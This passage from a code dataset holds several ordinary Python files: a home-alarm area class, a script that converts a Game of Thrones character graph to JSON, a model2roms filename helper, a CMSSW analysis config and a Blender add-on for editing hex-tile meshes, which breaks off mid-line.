\"\"\"The area name\"\"\"\n return \"Area {0}\".format(self.id)\n\n @property\n def mode(self):\n \"\"\"Get alarm mode.\"\"\"\n mode_str = self._data.get(\"mode\")\n\n if mode_str == \"{AREA_MODE_0}\":\n return DISARM\n if mode_str == \"{AREA_MODE_1}\":\n return ARM\n if mode_str == \"{AREA_MODE_2}\":\n return HOME1\n if mode_str == \"{AREA_MODE_3}\":\n return HOME2\n if mode_str == \"{AREA_MODE_4}\":\n return HOME3\n\n raise Exception(\"invalid mode: %s\" % mode_str)\n\n @property\n def is_disarmed(self):\n \"\"\"Is alarm in standby mode.\"\"\"\n return self.mode == DISARM\n\n @property\n def is_armed(self):\n \"\"\"Is alarm in away mode.\"\"\"\n return self.mode == ARM\n\n @property\n def is_home(self):\n \"\"\"Is alarm in home mode.\"\"\"\n return self.mode in [HOME1, HOME2, HOME3]\n\n @property\n def is_alarm_triggered(self):\n \"\"\"Is alarm in alarm triggered mode.\"\"\"\n return self.mode > 0 and int(self._data.get(\"alarm\")) == 1\n\n def __repr__(self):\n mode = (\n \"Disarmed\"\n if self.mode == DISARM\n else \"Armed\"\n if self.mode == ARM\n else \"Home 1\"\n if self.mode == HOME1\n else \"Home 2\"\n if self.mode == HOME2\n else \"Home 3\"\n if self.mode == HOME3\n else \"\"\n )\n\n alarm_triggered = \" [ALARM TRIGGERED!]\" if self.is_alarm_triggered else \"\"\n\n return \"Area {0}: {1}{2}\".format(self.id, mode, alarm_triggered)\n","sub_path":"lupupy/devices/area.py","file_name":"area.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"551086001","text":"import json\n\ngraph = json.load(open(\"graph.json\"))\n\nnodes = graph['graph']['node']\nedges = graph['graph']['edge']\nhouses = {}\npeople = {}\n\nfor node in nodes:\n num = node['id']\n for data in node['data']:\n key = data['key']\n value = data['text']\n node[key] = value\n\n if key == 'house-birth' or key == 'house-marriage' or key == 'group':\n if value not in houses.keys():\n houses[value] = -1 # []\n if num not in people.keys():\n people[num] = {}\n # houses[value].append({'id': num, 'type': key})\n people[num][key] = value\n del node['data']\n\nfor casata in houses.keys():\n num = int(num)+1\n houses[casata] = num\n nodes.append({'id': str(num), 'name': 
casata})\nprint(str(houses))\nprint('--------------------------------')\nprint(str(people))\n\nfor edge in edges:\n if 'list' in str(type(edge['data'])):\n for data in edge['data']:\n key = data['key']\n value = data['text']\n edge[key] = value\n else:\n key = edge['data']['key']\n value = edge['data']['text']\n edge[key] = value\n del edge['data']\n\nfor edge in edges:\n if edge['relation'] == 'killed': # and edge[]\n edge['value'] = 40\n edge['stroke'] = '#c52507'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'mother' and edge['type'] == 'biological':\n edge['value'] = 4\n edge['stroke'] = '#839098'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'father' and edge['type'] == 'biological':\n edge['value'] = 4\n edge['stroke'] = '#839098'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'sibling' and edge['type'] == 'biological':\n edge['value'] = 8\n edge['stroke'] = '#839098'\n edge['stroke-dasharray'] = '5,5'\n if edge['relation'] == 'father' and edge['type'] == 'legal':\n edge['value'] = 8\n edge['stroke'] = '#839098'\n edge['stroke-dasharray'] = '20,10,5,5,5,10'\n if edge['relation'] == 'lover':\n edge['value'] = 16\n edge['stroke'] = '#913ccd'\n edge['stroke-dasharray'] = '10,10'\n if edge['relation'] == 'spouse':\n edge['value'] = 4\n edge['stroke'] = '#913ccd'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'dragon':\n edge['value'] = 8\n edge['stroke'] = '#5481e6'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'direwolf':\n edge['value'] = 8\n edge['stroke'] = '#5481e6'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'pledge':\n edge['value'] = 24\n edge['stroke'] = '#98cb4a'\n edge['stroke-dasharray'] = '10,10'\n if edge['relation'] == 'allegiance' and edge['type'] == 'oath':\n edge['value'] = 16\n edge['stroke'] = '#98cb4a'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'kingsguard':\n edge['value'] = 16\n edge['stroke'] = '#98cb4a'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'queensquard':\n edge['value'] = 16\n edge['stroke'] = '#98cb4a'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'hand':\n edge['value'] = 16\n edge['stroke'] = '#98cb4a'\n edge['stroke-dasharray'] = '0'\n if edge['relation'] == 'allegiance' and edge['type'] == 'ward':\n edge['value'] = 16\n edge['stroke'] = '#98cb4a'\n edge['stroke-dasharray'] = '0'\nfor person in people.keys():\n value = 1\n if 'group' in people[person].keys():\n edges.append({\"source\": person, \"target\": str(houses[people[person]['group']]), \"type\": 'group', \"value\": value, \"stroke\":'black', 'stroke-dasharray': '0'})\n value *= 2\n if 'house-marriage' in people[person].keys():\n edges.append({\"source\": person, \"target\": str(houses[people[person]['house-marriage']]), \"type\": 'house-marriage', \"value\": value,\"stroke\":'black', 'stroke-dasharray': '0'})\n value *= 4\n if 'house-birth' in people[person].keys():\n edges.append({\"source\": person, \"target\": str(houses[people[person]['house-birth']]), \"type\": 'house-birth', \"value\": value,\"stroke\":'black', 'stroke-dasharray': '0'})\n value *= 2\n\nto_save = {'node': nodes, 'edge': edges}\n\n\nwith open('data2.json', 'w') as out_file:\n json.dump(to_save, out_file, 
indent=4)\n\n","sub_path":"pythonscript/json_converter.py","file_name":"json_converter.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"573231990","text":"import os\n\n# Main function called from model2roms\ndef getFilename(confM2R, year, month, defaultvar):\n if confM2R.indatatype == 'SODA3':\n if defaultvar is None: defaultvar = \"salinity\"\n filenamein = getSODA3filename(confM2R, year, month, defaultvar)\n if confM2R.indatatype == 'GLORYS':\n if defaultvar is None: defaultvar = \"temperature\"\n filenamein = getGLORYSfilename(confM2R, year, month, defaultvar)\n return filenamein\n \n# private functions called from within module\ndef getGLORYSfilename(confM2R, year, month, myvar):\n filename = confM2R.modelpath + 'glorys.nc'\n\n return filename\n\ndef getSODA3filename(confM2R, year, month, myvar):\n if (myvar in ['cn', 'hi', 'hs']):\n return confM2R.modelpath + \"soda.nc\"\n else:\n return confM2R.modelpath + \"soda.nc\"","sub_path":"forcingFilenames.py","file_name":"forcingFilenames.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"216292406","text":"import FWCore.ParameterSet.Config as cms\nfrom FWCore.ParameterSet.VarParsing import VarParsing\nfrom FastTiming.RecoTreeUtils.RecoFastTiming_cfi import *\n\noptions = VarParsing('analysis')\n\noptions.register('sampleName',\n 'SingleGammaE50_noPU',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n \"sample to process\")\noptions.parseArguments()\n\n## Get I/O files from the list given the sample name\nfilesOpt = cms.PSet(\n inputFiles = cms.untracked.vstring(\"\"),\n outputFile = cms.string(\"\")\n)\n\nGetSampleFiles(options.sampleName, filesOpt)\n\n##------------------------------------------------------------------------------\n\nprocess = cms.Process(\"RecoFastTiming\")\n\n## load the SK geometry and magnetic field config\nprocess.load('Configuration.Geometry.GeometryExtended2023SHCalNoTaperReco_cff')\nprocess.load('Configuration.Geometry.GeometryExtended2023SHCalNoTaper_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_38T_PostLS1_cff')\nprocess.load('Configuration/EventContent/EventContent_cff')\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = filesOpt.inputFiles)\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = filesOpt.outputFile)\n\nprocess.ft = cms.EDAnalyzer('RecoFastTiming')\n\nprocess.p = cms.Path(process.ft)\n","sub_path":"RecoTreeUtils/test/RecoFastTiming_cfg.py","file_name":"RecoFastTiming_cfg.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"477900088","text":"import re\nimport bpy\nimport bmesh\nimport mathutils\nimport math\nfrom collections import defaultdict\nfrom collections import deque\n\nVector = mathutils.Vector\nMatrix = mathutils.Matrix\n\nbl_info = {\n \"name\": \"Frontier tools\",\n \"category\": \"Object\",\n}\n\ndef edgesMap(obj, vert_indices):\n vert_set = set(vert_indices)\n edges = []\n for e in obj.data.edges:\n if e.vertices[0] in vert_set and e.vertices[1] in vert_set:\n edges.append((e.vertices[0], e.vertices[1]))\n\n out = defaultdict(list)\n for a, b in edges:\n out[a].append(b)\n out[b].append(a)\n return out\n\ndef boundingBox(positions):\n# if len(positions) == 0:\n# 
return (Vector((0,0,0)), Vector((0, 0, 0)))\n\n vmin = positions[0].copy()\n vmax = positions[0].copy()\n for pos in positions:\n for i in range(0, 3):\n vmin[i] = min(vmin[i], pos[i])\n vmax[i] = max(vmax[i], pos[i])\n return (vmin, vmax)\n\ndef borderVerts(obj):\n bout = []\n cout = []\n bgroup_idx = obj.vertex_groups.find(\"borders\")\n cgroup_idx = obj.vertex_groups.find(\"corners\")\n for vertex in obj.data.vertices:\n for group in vertex.groups:\n if group.weight > 0:\n if group.group == bgroup_idx:\n bout.append(vertex.index)\n if group.group == cgroup_idx:\n cout.append(vertex.index)\n return (bout, cout)\n\ndef selectVerts(obj, verts):\n assert(bpy.context.active_object == obj)\n toggle_edit = not obj.data.is_editmode\n if toggle_edit:\n bpy.ops.object.editmode_toggle()\n bm = bmesh.from_edit_mesh(obj.data)\n bm.verts.ensure_lookup_table()\n vert_set = set(verts)\n for vert in bm.verts:\n vert.select = vert.index in vert_set\n for face in bm.faces:\n face.select = all(v.index in vert_set for v in face.verts)\n for edge in bm.edges:\n edge.select = all(v.index in vert_set for v in edge.verts)\n bmesh.update_edit_mesh(obj.data)\n if toggle_edit:\n bpy.ops.object.editmode_toggle()\n\ndef shortestPath(obj, v1, v2, edge_map):\n prev = [-1] * len(obj.data.vertices)\n visited = [False] * len(obj.data.vertices)\n\n queue = deque([v1])\n while len(queue) > 0:\n v = queue.popleft()\n if visited[v]:\n continue\n visited[v] = True\n if v == v2:\n break\n for ev in edge_map[v]:\n if prev[ev] == -1:\n prev[ev] = v\n queue.append(ev)\n \n edge = [v2]\n while edge[-1] != v1:\n v = prev[edge[-1]]\n assert(v != -1)\n edge.append(v)\n edge.reverse()\n \n return edge\n\nhex_directions = [ (1, 0), (0, 1), (-1, 1), (-1, 0), (0, -1), (1, -1) ]\nhex_width = 5.196152423 #sin(60 deg) * 6\nhex_height = 6.0\nhex_verts = [\n Vector(( hex_width / 2.0, -hex_height / 4.0, 0)),\n Vector(( hex_width / 2.0, hex_height / 4.0, 0)),\n Vector((0, hex_height / 2.0, 0)),\n Vector((-hex_width / 2.0, hex_height / 4.0, 0)),\n Vector((-hex_width / 2.0, -hex_height / 4.0, 0)),\n Vector((0, -hex_height / 2.0, 0))\n]\n\ndef hexVector(x, y):\n move_x = Vector((hex_width / 2.0, 0.0, 0))\n move_y = Vector((0, hex_height * 0.75, 0))\n vec = move_x * 2 * x + move_y * y + move_x * y\n return vec\n\ndef hexPos(vec):\n y = vec[1] / (hex_height * 0.75)\n x = (vec[0] - y * (hex_width / 2.0)) / hex_width\n return (math.trunc(x + (-0.5 if x < 0 else 0.5)),\n math.trunc(y + (-0.5 if y < 0 else 0.5)))\n\ndef whichHexDirection(pos1, pos2):\n diff = (pos2[0] - pos1[0], pos2[1] - pos1[1])\n for i in range(0, len(hex_directions)):\n if diff == hex_directions[i]:\n return i\n return -1\n\n# Generates a list of eges each starting and ending at a corner\n# iterating over evry border vertex between them\ndef hexEdges(obj, cverts, bedge_map):\n used_edges = set([])\n out = []\n\n for cv in cverts:\n for nv in bedge_map[cv]:\n if (cv, nv) in used_edges:\n continue\n edge = [cv, nv]\n used_edges.add((cv, nv))\n used_edges.add((nv, cv))\n\n while (edge[-1] not in cverts):\n pv = edge[-1]\n ev = -1\n for nv in bedge_map[pv]:\n if not (pv, nv) in used_edges:\n ev = nv\n break\n assert(ev != -1)\n edge.append(ev)\n used_edges.add((pv, ev))\n used_edges.add((ev, pv))\n\n assert(edge[0] in cverts and edge[-1] in cverts)\n out.append(edge)\n return out\n\nclass HexNode:\n verts = []\n bverts = []\n cverts = [] #they are ordered as hex directions\n edges = [] #each edge stores a list of verts from one corner to another\n # they are ordered as hex directions\n 
pos = (0, 0)\n\n def __init__(self, obj, verts, bverts, cverts):\n self.verts = verts\n self.bverts = bverts\n self.cverts = cverts.copy()\n assert(len(cverts) == 6)\n\n bedge_map = edgesMap(obj, bverts)\n edges = hexEdges(obj, cverts, bedge_map)\n assert(len(edges) == 6)\n overts = obj.data.vertices\n (vmin, vmax) = boundingBox([overts[vi].co for vi in verts])\n center = (vmin + vmax) * 0.5\n self.pos = hexPos(center + obj.location)\n\n # Making sure that edges create a loop\n ordered_edges = [edges[0]]\n edges.remove(edges[0])\n for i in range(1, 6):\n next_vert = ordered_edges[-1][-1]\n for e in edges:\n if e[0] == next_vert:\n ordered_edges.append(e)\n edges.remove(e)\n break\n elif e[-1] == next_vert:\n e.reverse()\n ordered_edges.append(e)\n edges.remove(e)\n break\n assert(len(ordered_edges) == 6)\n for i in range(0, 6):\n assert(ordered_edges[i][-1] == ordered_edges[(i + 1) % 6][0])\n assert(ordered_edges[0][0] == ordered_edges[-1][-1])\n\n # Making sure that edges are ordered as hex_directions\n first = -1\n first_x = vmin[0]\n for i in range(0, 6):\n iv = ordered_edges[i][0]\n x = (overts[ordered_edges[i][0]].co[0] + overts[ordered_edges[i][-1]].co[0]) * 0.5\n if first == -1 or x > first_x:\n first = i\n first_x = x\n left_slice = ordered_edges[0:first]\n right_slice = ordered_edges[first:]\n ordered_edges = right_slice + left_slice\n\n # Reversing whole loop if necessary\n if overts[ordered_edges[0][0]].co[1] > overts[ordered_edges[0][-1]].co[1]:\n ordered_edges.reverse()\n last = ordered_edges.pop(-1)\n ordered_edges.insert(0, last)\n for edge in ordered_edges:\n edge.reverse()\n\n self.edges = ordered_edges\n ordered_verts = []\n for i in range(0, 6):\n cverts[i] = self.edges[i][0]\n ordered_verts += self.edges[i]\n \n # Verifying that vertices are properly ordered\n for i in range(len(ordered_verts)):\n v1 = ordered_verts[i]\n v2 = ordered_verts[(i + 1) % len(ordered_verts)]\n assert(v1 == v2 or v2 in bedge_map[v1])\n\n\ndef hexNodes(obj, bverts, cverts, only_one=False):\n bvert_set = set(bverts)\n verts = obj.data.vertices\n edge_map = edgesMap(obj, range(0, len(obj.data.vertices)))\n sel = [False] * len(verts)\n out = []\n\n for iv in range(0, len(verts)):\n node = []\n vis = [False] * len(verts)\n if sel[iv] or iv in bvert_set:\n continue\n neighs = [iv]\n while len(neighs) > 0:\n v = neighs.pop(-1)\n if sel[v]:\n continue\n if not vis[v]:\n node.append(v)\n vis[v] = True\n if not v in bvert_set:\n sel[v] = True\n neighs += edge_map[v]\n\n if len(node) > 0:\n nset = set(node)\n ncverts = []\n nbverts = []\n for cvert in cverts:\n if cvert in nset:\n ncverts.append(cvert)\n for bvert in bverts:\n if bvert in nset:\n nbverts.append(bvert)\n out.append(HexNode(obj, node, nbverts, ncverts))\n if only_one:\n return out\n return out\n\nclass HexMove(bpy.types.Operator):\n bl_idname = \"object.hex_move\"\n bl_label = \"Hex move\"\n bl_options = {'REGISTER', 'UNDO'}\n \n x = bpy.props.IntProperty(name=\"x\", default=0, min=-100, max=100)\n y = bpy.props.IntProperty(name=\"y\", default=0, min=-100, max=100)\n\n def execute(self, context):\n mat = bpy.context.region_data.view_rotation.to_matrix()\n vec_right = mat * Vector((1, 0, 0))\n vec_up = mat * Vector((0, 1, 0))\n\n if abs(vec_right[0]) > abs(vec_right[1]):\n vec_right[0] = math.copysign(1.0, vec_right[0])\n vec_right[1] = 0\n vec_up[0] = 0\n vec_up[1] = math.copysign(1.0, vec_up[1])\n else:\n vec_right[0] = 0\n vec_right[1] = math.copysign(1.0, vec_right[1])\n vec_up[0] = math.copysign(1.0, vec_up[0])\n vec_up[1] = 0\n vec = 
(vec_right[0] * self.x + vec_up[0] * self.y, vec_right[1] * self.x + vec_up[1] * self.y)\n for obj in bpy.context.selected_objects:\n #print(\"Moving from: \" + str(hexPos(obj.location)) + \" To: \" + str(hexPos(obj.location + hexVector(self.x, self.y))))\n obj.location += hexVector(vec[0], vec[1])\n return {'FINISHED'}\n\nclass HexSplit(bpy.types.Operator):\n bl_idname = \"object.hex_split\"\n bl_label = \"Hex split\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def fixHexLocation(self, obj):\n if len(obj.data.vertices) == 0:\n return\n (vmin, vmax) = boundingBox([v.co for v in obj.data.vertices])\n center = (vmin + vmax) * 0.5\n hex_pos = hexPos(center + obj.location)\n new_origin = hexVector(hex_pos[0], hex_pos[1]) - obj.location\n for vert in obj.data.vertices:\n vert.co -= new_origin\n obj.location += new_origin\n\n def extractPatch(self, obj, bverts, cverts):\n bvert_set = set(bverts)\n verts = obj.data.vertices\n edge_map = edgesMap(obj, range(0, len(obj.data.vertices)))\n sel = [False] * len(verts)\n\n for iv in range(0, len(verts)):\n node = []\n vis = [False] * len(verts)\n if sel[iv] or iv in bvert_set:\n continue\n neighs = [iv]\n while len(neighs) > 0:\n v = neighs.pop(-1)\n if sel[v]:\n continue\n if not vis[v]:\n node.append(v)\n vis[v] = True\n if not v in bvert_set:\n sel[v] = True\n neighs += edge_map[v]\n\n if len(node) > 0:\n return node\n return []\n\n def execute(self, context):\n if len(bpy.context.selected_objects) != 1:\n raise Exception(\"Exactly one object must be selected\")\n\n obj = bpy.context.active_object\n old_objects = set(bpy.data.objects)\n \n while True:\n (bverts, cverts) = borderVerts(obj)\n patch = self.extractPatch(obj, bverts, cverts)\n if len(patch) == 0 or len(patch) == len(obj.data.vertices):\n break\n selectVerts(obj, patch)\n bpy.ops.object.editmode_toggle()\n bpy.ops.mesh.separate()\n bpy.ops.object.editmode_toggle()\n\n self.fixHexLocation(obj)\n for obj in bpy.data.objects:\n if not obj in old_objects:\n self.fixHexLocation(obj)\n return {'FINISHED'}\n\nclass HexJoin(bpy.types.Operator):\n bl_idname = \"object.hex_join\"\n bl_label = \"Hex join\"\n bl_options ={'REGISTER', 'UNDO'}\n\n max_dist = bpy.props.FloatProperty(name=\"max_dist\", default=0.5, min=0.00001, max=10.0)\n\n # returns pair: (min dist, bool whether edge order should be swapped)\n def edgeDist(self, obj, edge1, edge2):\n if len(edge1) != len(edge2):\n return None\n dist1 = 0.0\n dist2 = 0.0\n overts = obj.data.vertices\n count = len(edge1)\n for i in range(0, count - 1):\n dist1 += (overts[edge1[i]].co - overts[edge2[i]].co).length\n dist2 += (overts[edge1[i]].co - overts[edge2[count - i - 1]].co).length\n dist1 /= float(count)\n dist2 /= float(count)\n return (min(dist1, dist2), dist1 > dist2)\n\n def mergeVerts(self, obj, merge_dict):\n bm = bmesh.from_edit_mesh(obj.data)\n bm.verts.ensure_lookup_table()\n\n merge_map = {}\n while len(merge_dict) > 0:\n item = merge_dict.popitem()\n merge = [item[0]]\n merge += item[1]\n todo = item[1]\n while len(todo) > 0:\n tnode = todo.pop(-1)\n item = merge_dict.pop(tnode, [])\n for node in item:\n if not node in merge:\n todo.append(node)\n merge.append(node)\n merge_set = set(merge)\n merge = [e for e in merge_set]\n for i in range(0, len(merge) - 1):\n merge_map[bm.verts[merge[i]]] = bm.verts[merge[-1]]\n bmesh.ops.weld_verts(bm, targetmap=merge_map)\n\n bmesh.update_edit_mesh(obj.data)\n bpy.ops.object.editmode_toggle()\n\n def execute(self, context):\n bpy.ops.object.join()\n obj = bpy.context.active_object\n\n (bverts, cverts) = 
borderVerts(obj)\n bedge_map = edgesMap(obj, bverts)\n all_edges = hexEdges(obj, cverts, bedge_map)\n #TODO: group into separate segments\n\n pairs = []\n for e1 in range(0, len(all_edges)):\n for e2 in range(e1 + 1, len(all_edges)):\n result = self.edgeDist(obj, all_edges[e1], all_edges[e2])\n if result != None and result[0] < self.max_dist:\n pairs.append((result[0], result[1], e1, e2))\n pairs.sort()\n\n merge_dict = defaultdict(list)\n for pair in pairs:\n e1 = all_edges[pair[2]]\n e2 = all_edges[pair[3]]\n\n for i in range(0, len(e1)):\n v1 = e1[i]\n v2 = e2[len(e1) - i - 1 if pair[1] else i]\n merge_dict[v1].append(v2)\n merge_dict[v2].append(v1)\n bpy.ops.object.editmode_toggle()\n self.mergeVerts(obj, merge_dict)\n\n return {'FINISHED'}\n\nclass HexDuplicate(bpy.types.Operator):\n bl_idname = \"object.hex_duplicate\"\n bl_label = \"Hex duplicate\"\n bl_options = {'REGISTER', 'UNDO'}\n \n def execute(self, context):\n objs = bpy.context.selected_objects\n if len(objs) != 1:\n raise Exception(\"Exactly one object must be selected\")\n obj = objs[0]\n\n moves = [ (1, 0), (-1, 0), (0, 1), (0, -1), (-1, 1), (1, -1) ]\n for move in moves:\n obj.select = True\n bpy.ops.object.duplicate()\n cur = bpy.context.selected_objects[0]\n cur.location += hexVector(move[0], move[1])\n cur.select = False\n return {'FINISHED'}\n\n\nclass HexFix(bpy.types.Operator):\n bl_idname = \"object.hex_fix\"\n bl_label = \"Hex fix\"\n bl_options ={'REGISTER', 'UNDO'}\n\n #TODO: make this tool more useful\n def fix(self, obj):\n mesh = obj.data\n\n (bverts, cverts) = borderVerts(obj)\n hnodes = hexNodes(obj, bverts, cverts)\n for hnode in hnodes:\n for side in range(0, 6):\n edge = hnode.edges[side]\n vec = hexVector(hnode.pos[0], hnode.pos[1]) - obj.location\n start = hex_verts[side] + vec\n end = hex_verts[(side + 1) % 6] + vec\n\n count = len(edge)\n for j in range(0, count):\n blend = start + (end - start) * (j / float(count - 1))\n vert = mesh.vertices[edge[j]]\n vert.co[0] = blend[0]\n vert.co[1] = blend[1]\n\n def execute(self, context):\n for obj in bpy.context.selected_objects:\n self.fix(obj)\n return {'FINISHED'}\n\n#TODO: doesn't work well for complicated topologies\nclass HexCopy(bpy.types.Operator):\n bl_idname = \"object.hex_copy\"\n bl_label = \"Hex copy\"\n bl_options ={'REGISTER', 'UNDO'}\n \n src_side = bpy.props.IntProperty(name=\"src_side\", default=0, min=0, max=5)\n dst_side = bpy.props.IntProperty(name=\"dst_side\", default=0, min=0, max=5)\n num_lines = bpy.props.IntProperty(name=\"num_lines\", default=5, min=1, max=100)\n mirror = bpy.props.BoolProperty(name=\"mirror\", default=False)\n\n # returns lists of references to vertices\n def getLines(self, obj, side):\n (bverts, cverts) = borderVerts(obj)\n hnodes = hexNodes(obj, bverts, cverts)\n assert(len(hnodes) == 1)\n edge_map = edgesMap(obj, range(0, len(obj.data.vertices)))\n edges = hnodes[0].edges\n\n out = []\n overts = obj.data.vertices\n num_lines = min(len(edges[0]), self.num_lines)\n for i in range(0, num_lines):\n path = shortestPath(obj, edges[(side + 1) % 6][i], edges[(side + 5) % 6][-(i + 1)], edge_map)\n out.append([overts[vert] for vert in path])\n return out\n\n\n def execute(self, context):\n src_obj = bpy.context.active_object\n dst_objs = [src_obj]\n if len(bpy.context.selected_objects) > 1:\n dst_objs = bpy.context.selected_objects.copy()\n dst_objs.remove(src_obj)\n\n src_lines = self.getLines(src_obj, self.src_side)\n dst_liness = []\n num_lines = len(src_lines)\n for i in range(0, len(dst_objs)):\n dst_lines = 
self.getLines(dst_objs[i], self.dst_side)\n dst_liness.append(dst_lines)\n assert(num_lines == len(dst_lines))\n for l in range(0, num_lines):\n if len(src_lines[l]) != len(dst_lines[l]):\n print(\"Hex nodes have incompatible topologies\")\n print(\"Line lengths: \" + str(len(src_lines[l])) + \" \" + str(len(dst_lines[l])))\n return {'FINISHED'}\n\n for dst_lines in dst_liness:\n for l in range(0, num_lines):\n blend = float(num_lines - l) / float(num_lines)\n line_len = len(src_lines[l])\n\n for j in range(0, line_len):\n sj = line_len - j - 1 if self.mirror else j\n dst_lines[l][j].co[2] += (src_lines[l][sj].co[2] - dst_lines[l][j].co[2]) * blend\n return {'FINISHED'}\n\n\nclass HexSymmetrizeNeighbours(bpy.types.Operator):\n bl_idname = \"object.hex_symmetrize_neighbours\"\n bl_label = \"Hex symmetrize neighbours\"\n bl_options ={'REGISTER', 'UNDO'}\n\n def execute(self, context):\n objs = bpy.context.selected_objects\n if len(objs) != 2:\n raise Exception(\"You must select exactly 2 hexes\")\n (bverts1, cverts1) = borderVerts(objs[0])\n (bverts2, cverts2) = borderVerts(objs[1])\n hnodes1 = hexNodes(objs[0], bverts1, cverts1)\n hnodes2 = hexNodes(objs[1], bverts2, cverts2)\n\n assert(len(hnodes1) == 1 and len(hnodes2) == 1)\n hex_dir = whichHexDirection(hnodes1[0].pos, hnodes2[0].pos)\n if hex_dir == -1:\n raise Exception(\"Selected objects must be neighbours\")\n\n overts1 = objs[0].data.vertices\n overts2 = objs[1].data.vertices\n edge_map1 = edgesMap(objs[0], range(0, len(objs[0].data.vertices)))\n edge_map2 = edgesMap(objs[1], range(0, len(objs[1].data.vertices)))\n edges1 = hnodes1[0].edges\n edges2 = hnodes2[0].edges\n edst1 = (edges1[(hex_dir + 2) % 6], edges1[(hex_dir + 4) % 6])\n esrc1 = (edges2[(hex_dir + 2) % 6], edges2[(hex_dir + 4) % 6])\n edst2 = (edges2[(hex_dir + 1) % 6], edges2[(hex_dir + 5) % 6])\n esrc2 = (edges1[(hex_dir + 1) % 6], edges1[(hex_dir + 5) % 6])\n elen = len(edst1[0])\n\n for i in range(0, elen):\n p1dst = shortestPath(objs[0], edst1[0][i], edst1[1][-(i + 1)], edge_map1)\n p1src = shortestPath(objs[1], esrc1[0][i], esrc1[1][-(i + 1)], edge_map2)\n p2dst = shortestPath(objs[1], edst2[0][i], edst2[1][-(i + 1)], edge_map2)\n p2src = shortestPath(objs[0], esrc2[0][i], esrc2[1][-(i + 1)], edge_map1)\n assert(len(p1src) == len(p1dst))\n assert(len(p2src) == len(p2dst))\n for j in range(0, len(p1src)):\n overts1[p1dst[j]].co = overts2[p1src[j]].co\n for j in range(0, len(p2src)):\n overts2[p2dst[j]].co = overts1[p2src[j]].co\n\n return {'FINISHED'}\n\nclass HexSymmetrize(bpy.types.Operator):\n bl_idname = \"object.hex_symmetrize\"\n bl_label = \"Hex symmetrize\"\n bl_options ={'REGISTER', 'UNDO'}\n \n num_lines = bpy.props.IntProperty(name=\"num_lines\", default=5, min=1, max=100)\n\n def execute(self, context):\n obj = bpy.context.active_object\n (bverts, cverts) = borderVerts(obj)\n hnodes = hexNodes(obj, bverts, cverts)\n assert(len(hnodes) == 1)\n\n overts = obj.data.vertices\n edge_map = edgesMap(obj, range(0, len(obj.data.vertices)))\n edges = hnodes[0].edges\n num_lines = min(len(edges[0]), self.num_lines)\n\n for i in range(0, num_lines):\n psrc = shortestPath(obj, edges[1][i], edges[5][-(i + 1)], edge_map)\n plen = len(psrc)\n blend = float(num_lines - i) / float(num_lines)\n\n height_map = [0.0] * plen\n for j in range(0, plen):\n height_map[j] = (overts[psrc[j]].co[2] + overts[psrc[plen - j - 1]].co[2]) * 0.5\n\n for hex_dir in range(0, 6):\n pdst = shortestPath(obj, edges[(hex_dir + 1) % 6][i], edges[(hex_dir + 5) % 6][-(i + 1)], edge_map)\n 
assert(len(pdst) == plen)\n for j in range(0, plen):\n overts[pdst[j]].co[2] += (height_map[j] - overts[pdst[j]].co[2]) * blend\n\n return {'FINISHED'}\n\nclass HexMakeGroup(bpy.types.Operator):\n bl_idname = \"object.hex_make_group\"\n bl_label = \"Hex make group\"\n bl_options ={'REGISTER', 'UNDO'}\n\n def execute(self, context):\n obj = bpy.context.active_object\n cur_group = None\n for group in bpy.data.groups:\n if obj.name in group.objects and len(group.objects) == 1:\n cur_group = group\n break\n if cur_group != None:\n bpy.data.groups.remove(cur_group)\n\n cur_group = bpy.data.groups.new(obj.name)\n cur_group.objects.link(obj)\n cur_group.dupli_offset = obj.location\n return {'FINISHED'}\n\ndef objectMenuFunc(self, context):\n self.layout.operator(HexDuplicate.bl_idname)\n self.layout.operator(HexJoin.bl_idname)\n self.layout.operator(HexSplit.bl_idname)\n self.layout.operator(HexCopy.bl_idname)\n\ndef registerKey(key, clazz, obj_km, sculpt_km=None, oskey=True):\n k1 = obj_km.keymap_items.new(clazz.bl_idname, key, 'PRESS', oskey=oskey)\n if sculpt_km != None:\n k2 = sculpt_km.keymap_items.new(clazz.bl_idname, key, 'PRESS', oskey=oskey)\n return [k1, k2]\n return k1\n\ndef register():\n bpy.utils.register_class(HexDuplicate)\n bpy.utils.register_class(HexFix)\n bpy.utils.register_class(HexMove)\n bpy.utils.register_class(HexSplit)\n bpy.utils.register_class(HexJoin)\n bpy.utils.register_class(HexSymmetrize)\n bpy.utils.register_class(HexCopy)\n bpy.utils.register_class(HexMakeGroup)\n\n bpy.types.VIEW3D_MT_object.append(objectMenuFunc)\n\n wm = bpy.context.window_manager\n obj_km = wm.keyconfigs.addon.keymaps.new(name='Object Mode', space_type='EMPTY')\n sculpt_km = wm.keyconfigs.addon.keymaps.new(name='Sculpt', space_type='EMPTY')\n\n registerKey('F', HexFix, obj_km, sculpt_km)\n registerKey('R', HexSymmetrize, obj_km, sculpt_km)\n registerKey('C', HexCopy, obj_km, sculpt_km)\n\n registerKey('D', HexDuplicate, obj_km)\n registerKey('S', HexSplit, obj_km)\n registerKey('J', 